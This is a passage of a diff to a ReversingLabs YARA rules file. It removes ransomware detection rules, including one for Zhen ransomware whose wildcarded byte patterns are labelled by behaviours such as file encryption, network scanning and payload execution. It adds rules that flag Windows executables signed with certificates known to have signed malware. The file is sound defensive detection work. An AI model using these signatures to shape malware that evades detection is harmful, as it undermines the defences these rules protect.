-            E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$exec_payload = {
-            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C3
-        }
-		$copy_payload = {
-            55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ??
-            ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
-            8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$generate_strings_to_encrypt = {
-            0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
-            ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16782-L16798"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload ) or ( $encrypt_file and $server_communication_1 and $copy_payload ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures [ i ] . serial == "1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zhen ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd"
-		date = "2021-04-28"
-		modified = "2021-04-28"
+		id = "46166e9e-515d-530a-a651-59821d979f01"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16800-L16816"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65"
+		logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zhen"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15
-            ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ??
-            ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D
-        }
-		$find_files_p2 = {
-            8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55
-            ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55
-            ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B
-            4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91
-            ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D
-            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ??
-            ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ??
-            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66
-            8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B
-            02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
-            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45
-            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51
-        }
-		$encrypt_files_p2 = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ??
-            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D
-            ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ??
-            EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52
-            FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ??
-            FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-            ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15
-            ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B
-            45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$scan_network_p1 = {
-            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52
-            FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B
-            95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF
-            15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
-            8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF
-        }
-		$scan_network_p2 = {
-            15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF
-            15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ??
-            ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82
-            50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B
-            51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9
-            ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B
-            42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA
-            ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ??
-            33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B
-            55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ??
-            C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$scan_network_p3 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
-            ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ??
-            ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15
-            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52
-            FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-        }
-		$scan_network_p4 = {
-            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ??
-            51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D
-            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ??
-            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ??
-            ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D
-            ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "df2423da-37ec-5adc-8497-2ac975b0b7ff"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16818-L16834"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $scan_network_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
